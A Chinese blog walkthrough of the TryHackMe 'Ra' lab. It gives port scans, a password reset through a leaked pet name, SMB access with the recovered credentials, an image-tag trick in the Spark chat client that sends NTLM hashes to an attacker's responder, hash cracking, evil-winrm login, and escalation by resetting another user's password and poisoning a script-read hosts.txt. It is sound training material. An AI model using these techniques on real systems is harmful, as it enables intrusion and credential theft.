noone___'s blog
0%

THM打靶日寄18-RA

发表于 更新于 分类于
期中考还有体测还有好几个ctf比赛,耽搁了不少时间

  • 扫描打点

    开的端口有点太多了,就不截图直接复制了

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    PORT     STATE SERVICE             VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |     bind
    |     root-servers
    |     nstld
    |_    verisign-grs
    80/tcp   open  http                Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    88/tcp   open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-11-07 08:52:26Z)
    135/tcp  open  msrpc               Microsoft Windows RPC
    139/tcp  open  netbios-ssn         Microsoft Windows netbios-ssn
    389/tcp  open  ldap
    443/tcp  open  ssl/https?
    | tls-alpn: 
    |_  http/1.1
    | ssl-cert: Subject: commonName=Windows Admin Center
    | Subject Alternative Name: DNS:WIN-2FAA40QQ70B
    | Not valid before: 2020-04-30T14:41:03
    |_Not valid after:  2020-06-30T14:41:02
    |_ssl-date: 2024-11-07T08:55:04+00:00; -1s from scanner time.
    445/tcp  open  microsoft-ds?
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  ldapssl?
    2179/tcp open  vmrdp?
    3268/tcp open  ldap
    3269/tcp open  globalcatLDAPssl?
    3389/tcp open  ms-wbt-server       Microsoft Terminal Services
    |_ssl-date: 2024-11-07T08:55:04+00:00; -1s from scanner time.
    | ssl-cert: Subject: commonName=Fire.windcorp.thm
    | Not valid before: 2024-11-06T08:43:29
    |_Not valid after:  2025-05-08T08:43:29
    | rdp-ntlm-info: 
    |   Target_Name: WINDCORP
    |   NetBIOS_Domain_Name: WINDCORP
    |   NetBIOS_Computer_Name: FIRE
    |   DNS_Domain_Name: windcorp.thm
    |   DNS_Computer_Name: Fire.windcorp.thm
    |   DNS_Tree_Name: windcorp.thm
    |   Product_Version: 10.0.17763
    |_  System_Time: 2024-11-07T08:53:49+00:00
    5222/tcp open  jabber
    |_ssl-date: 2024-11-07T08:55:07+00:00; -1s from scanner time.
    | ssl-cert: Subject: commonName=fire.windcorp.thm
    | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
    | Not valid before: 2020-05-01T08:39:00
    |_Not valid after:  2025-04-30T08:39:00
    | xmpp-info: 
    |   STARTTLS Failed
    |   info: 
    |     xmpp: 
    |       version: 1.0
    |     errors: 
    |       invalid-namespace
    |       (timeout)
    |     features: 
    |     unknown: 
    |     compression_methods: 
    |     stream_id: 19qg18wl2w
    |     capabilities: 
    |_    auth_mechanisms: 
    | fingerprint-strings: 
    |   RPCCheck: 
    |_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
    5269/tcp open  xmpp                Wildfire XMPP Client
    | xmpp-info: 
    |   STARTTLS Failed
    |   info: 
    |     xmpp: 
    |     errors: 
    |       (timeout)
    |     features: 
    |     unknown: 
    |     compression_methods: 
    |     capabilities: 
    |_    auth_mechanisms: 
    7070/tcp open  http                Jetty 9.4.18.v20190429
    |_http-server-header: Jetty(9.4.18.v20190429)
    |_http-title: Openfire HTTP Binding Service
    7443/tcp open  ssl/oracleas-https?
    | ssl-cert: Subject: commonName=fire.windcorp.thm
    | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
    | Not valid before: 2020-05-01T08:39:00
    |_Not valid after:  2025-04-30T08:39:00
    7777/tcp open  socks5              (No authentication; connection failed)
    | socks-auth-info: 
    |_  No authentication
    9090/tcp open  zeus-admin?
    | fingerprint-strings: 
    |   GetRequest: 
    |     HTTP/1.1 200 OK
    |     Date: Thu, 07 Nov 2024 08:52:26 GMT
    |     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
    |     Content-Type: text/html
    |     Accept-Ranges: bytes
    |     Content-Length: 115
    |     <html>
    |     <head><title></title>
    |     <meta http-equiv="refresh" content="0;URL=index.jsp">
    |     </head>
    |     <body>
    |     </body>
    |     </html>
    |   HTTPOptions: 
    |     HTTP/1.1 200 OK
    |     Date: Thu, 07 Nov 2024 08:52:36 GMT
    |     Allow: GET,HEAD,POST,OPTIONS
    |   JavaRMI, drda, ibm-db2-das, informix: 
    |     HTTP/1.1 400 Illegal character CNTL=0x0
    |     Content-Type: text/html;charset=iso-8859-1
    |     Content-Length: 69
    |     Connection: close
    |     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
    |   SqueezeCenter_CLI: 
    |     HTTP/1.1 400 No URI
    |     Content-Type: text/html;charset=iso-8859-1
    |     Content-Length: 49
    |     Connection: close
    |     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
    |   WMSRequest: 
    |     HTTP/1.1 400 Illegal character CNTL=0x1
    |     Content-Type: text/html;charset=iso-8859-1
    |     Content-Length: 69
    |     Connection: close
    |_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
    9091/tcp open  ssl/xmltec-xmlmail?
    | ssl-cert: Subject: commonName=fire.windcorp.thm
    | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
    | Not valid before: 2020-05-01T08:39:00
    |_Not valid after:  2025-04-30T08:39:00

    • 80 端口:

      首先是看下网站内容,有一堆人的邮箱,不知道有没有用

      然后去翻源码,找到这个:

      那么就加到 /etc/hosts 里面再去访问,这里最好顺手把 windcorp.thm 也加进去:

      有个密码重置界面但需要密保

      犯病了,这玩意就在网站右上角,不用看源码

      大致扫了一下这两个发现都没啥东西:

      破案了,是主页泄露的个人信息:

      即员工 lilyle 的宠物名 Sparky ,那么去重置密码:

      拿到账密 lilyle:ChangeMe#1234

  • 拿入口机

    去看一下扫到的端口结果,发现没有 CMS 来给我登录,ssh 也没开

    接下来思路就是找能连上去的地方:

    看到 445 试一下 smb 来连:

    enum4linux 直接爆发现被拦截了:

    那就用 smbmap 加上账密看一下:

    1
    smbmap -u lilyle -p ChangeMe#1234 -R -H windcorp.thm

    Shared 下面找到第一个 flag 和版本信息 spark 2.8.3

    smbclient //windcorp.thm/Shared -U lilyle 连上,get 下来:

    顺便把那个 spark 下下来安装一下:

    但是发现超时了:

    要用 smbclient //windcorp.thm/Shared -U lilyle -t 500 来延长超时检测时间,大概要等五分钟左右吧:

    安装一下 没有jdk8不让安装哈哈

    https://www.oracle.com/java/technologies/downloads/

    放到 usr/lib/jvm 里面,然后解压一下

    ~/.zshrc 编辑一下环境变量:

    在末尾加上:

    1
    2
    export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_381
    export PATH=$JAVA_HOME/bin:$PATH

    然后可以安装了:

    dpkg-deb -X spark_2_8_3.deb /spark

    然后 java 环境又出问题了,但电脑快没没电了,就先跳过这里:

    发现是 Ignite Realtime Spark ,直接搜到 CVE :

    这个漏洞允许在向对方用户以 <img src=[external_ip]/test.img> 的格式发送图片时,通过 response 拿到对话用户的密码 hash

    先在本机开一个 responder 来收 hash

    1
    responder -I tun0

    然后去软件里面登录刚刚的账密,随便挑一个人发消息:

    responder 里面收到 hash ,用 john 爆破一下得到账密:

    buse:uzunLM+3131

    然后不会了,看 wp

    发现还是扫描的问题,端口没扫全啊嗯

    1
    nmap --min-rate 10000 -p- 10.10.136.0

    这里,应该注意到 5985 端口,该端口运行着 win-rm 服务

    那么可以使用 evil-winrm 来连接:

    1
    evil-winrm -i windcorp.thm -u buse -p uzunLM+3131

    发力了啊嗯,转到 attackbox

    在当前用户的桌面找到 Flag 2

  • Windows 提权

    不会,偷看wp

    先去看一下用户组权限:

    去看下官方文档,发现不能更改管理员用户权限:

    然后去 C:\script 找到一个 powershell 脚本

    具体内容是读取 C:\Users\brittanycr\hosts.txt 每一行并通过 Invoke-Expression 执行

    所以可以尝试修改其中内容来进行命令执行,但当前用户显然没有权限更改别人目录下的 hosts.txt

    但有权限更改别人的密码(

    1
    net user brittanycr 'qwq2501###'

    拿到账密 brittanycr:qwq2501###

    但令人感慨的是连不上这个用户,只能用 smb 再试试:

    1
    smbclient //windcorp.thm/Users -U brittanycr

    然后本地写个新的 hosts.txt push 上去

    然后再用 evil-winrm 连新账户 noone:qwq2501#

    1
    evil-winrm -i windcorp.thm -u noone -p 'qwq2501#'

    连上去拿到 Flag 3